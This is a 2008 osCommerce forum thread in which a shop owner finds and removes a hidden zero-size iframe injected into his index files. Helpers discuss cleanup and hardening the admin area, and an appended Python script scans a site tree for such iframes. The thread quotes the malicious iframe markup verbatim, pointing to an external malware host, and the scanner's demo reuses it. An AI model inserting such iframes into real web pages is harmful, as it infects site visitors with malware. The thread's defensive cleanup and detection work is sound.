Guest Posted March 16, 2008

Today I'm getting a popup asking to install an add-on when I access my Admin or Catalog. Checking through my Host file manager, I find that the htdocs and Index have been modified at 3am today. I'm not sure what I'm looking for in the Index to see if anything was added.

Site is www.webberaerialimaging.com/catalog

Not sure what the popup is but it triggers my virus checker as a Trojan.

Any assistance is greatly appreciated!

Thanks,
Mark

Guest Posted March 16, 2008

I've checked over both Index files (catalog and admin) and cannot find what was added. I'm wondering if it's possible to just replace my current Index files with a clean version. Also, is it possible to download just the index files from here?

Thanks,
Mark

Guest Posted March 17, 2008

This does only seem to affect the index pages. Product pages do not generate the popup. Can anyone check my index for unwanted code? No matter how long I stare at it, I don't see the problem.

SambaMambo Posted March 17, 2008

What is the <iframe> in the top of the source and in the bottom?

Guest Posted March 17, 2008

Yep, I just found that. Looks like it's in the bottom iframe. Looks like this:

<iframe src="http://x-traff.info/in.cgi?default" width="0" height="0" frameborder="0"></iframe>

What if anything should it read? I don't see a top iframe.

Thanks for the look!

pvtparts Posted March 17, 2008

I reckon that whole iframe shouldn't be there. A quick google around suggests that the x-traff.info site is a deploy vector for malware. Presumably, somebody has written the iframe to your php files.

Guest Posted March 17, 2008

Ok, I've removed the whole iframe. Site seems to function normally now. I can only figure that it was accessed via the admin. Is it possible to change the Admin file name to make it more difficult for hackers in the future to locate my admin page?

EDIT: Seems I was wrong. Recent access is still pulling a popup for that site. Must be multiple entries. Oh Boy...

Bushmaster Posted March 17, 2008

> Ok, I've removed the whole iframe. Site seems to function normally now. I can only figure that it was accessed via the admin. Is it possible to change the Admin file name to make it more difficult for hackers in the future to locate my admin page?
>
> EDIT: Seems I was wrong. Recent access is still pulling a popup for that site. Must be multiple entries. Oh Boy...

Yes you can rename your admin folder to anything you want it to be. You just need to be sure to change the path in your config files.

satish Posted March 17, 2008

Probably your system where you are doing PHP development has been attacked and it will write to PHP files. So, unaware, you will be uploading these files. Try some antivirus or other solutions to clear your PC. Take this seriously, as some visitors might get afraid and will never visit your site, plus some search engines may ban your site if malware/trojans are reported.

Satish

Ask/Skype for Free osCommerce value addon/SEO suggestion tips for your site.
Check My About US For who am I and what My company does.

Guest Posted March 17, 2008

I have not done any work on the site, particularly at the time this all occurred. I have checked over my computer, in any case. Thank you for the suggestion.

Pardon my ignorance, but which and how many config files need the paths changed if I rename the Admin? I also cannot locate where to change my login/password.

Thanks for all the help, so far.
Mark

Guest Posted March 17, 2008

Finally got it all cleaned out. Every Index file was infected (wow, there are a lot of them). All pages on the Admin and Catalog sides load w/o the popup.

Now, for new security measures. How to change Admin and reset login/password?
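
An added example, not part of the original thread: since every index file carried the same hidden iframe, a scan of the whole web root finds all copies faster than reading each file by eye. The function names, the file extensions checked and the sample tree are assumptions made for this sketch; the sample iframe is the one quoted above.

```python
import re
import tempfile
from pathlib import Path
from urllib.parse import urlparse

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.IGNORECASE)
ATTR_RE = re.compile(r"""([\w-]+)\s*=\s*["']?([^"'\s>]+)""")
SCAN_EXT = (".php", ".html", ".htm", ".js")  # assumption: file types worth checking

def suspicious_iframes(text, own_hosts=()):
    """Return (line_no, tag, reasons) for iframes that are hidden or load an external host."""
    hits = []
    for m in IFRAME_RE.finditer(text):
        attrs = {k.lower(): v for k, v in ATTR_RE.findall(m.group(0))}
        reasons = []
        if attrs.get("width") in ("0", "1") or attrs.get("height") in ("0", "1"):
            reasons.append("hidden")
        host = urlparse(attrs.get("src", "")).hostname
        if host and host.lower() not in own_hosts:
            reasons.append("external:" + host.lower())
        if reasons:
            hits.append((text.count("\n", 0, m.start()) + 1, m.group(0), reasons))
    return hits

def scan_tree(root, own_hosts=()):
    """Walk root and return {relative_path: hits} for every file with a suspicious iframe."""
    report = {}
    for path in sorted(Path(root).rglob("*")):
        if path.is_file() and path.suffix.lower() in SCAN_EXT:
            hits = suspicious_iframes(path.read_text(encoding="utf-8", errors="replace"), own_hosts)
            if hits:
                report[path.relative_to(root).as_posix()] = hits
    return report

def demo():
    """Build a constructed site tree (two infected index files, one clean page) and scan it."""
    bad = '<iframe src="http://x-traff.info/in.cgi?default" width="0" height="0" frameborder="0"></iframe>'
    with tempfile.TemporaryDirectory() as root:
        files = {"index.php": "<html>\n<body>shop</body>\n" + bad + "\n</html>",
                 "admin/index.php": "<?php echo 'x'; ?>\n" + bad,
                 "product_info.php": '<iframe src="/help.html" width="400" height="300"></iframe>'}
        for rel, body in files.items():
            target = Path(root, rel)
            target.parent.mkdir(parents=True, exist_ok=True)
            target.write_text(body, encoding="utf-8")
        return scan_tree(root)

if __name__ == "__main__":
    for path, hits in demo().items():
        print(path, [(line, reasons) for line, _tag, reasons in hits])
```

Run `scan_tree()` against a downloaded copy of the site and pass the shop's own hostname in `own_hosts`; iframes hidden through CSS rather than `width`/`height` attributes are outside what this check covers.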

pvtparts Posted March 17, 2008

> Now, for new security measures. How to change Admin and reset login/password?

If memory serves, you can just use your FTP client to rename the admin directory. I don't think there are any paths to change. Your server administration / control panel may have a tool for writing new .htaccess / .htpasswd files.

Guest Posted March 18, 2008

I did see a few config files that had defined 'admin'. I'll check the server control panel. Don't recall seeing that tool, but I'll check. Thanks

Edit: Got the password changed on the server control panel. Thanks for that! I remain a bit concerned about renaming the admin file w/o changing any of the paths.

Guest Posted March 18, 2008

> If memory serves, you can just use your FTP client to rename the admin directory. I don't think there are any paths to change. Your server administration / control panel may have a tool for writing new .htaccess / .htpasswd files.

If you rename the folder on your hard drive and ftp it to the server, you'll need to make sure you also delete the old admin folder from the server and change the path to admin in the admin folder configuration file.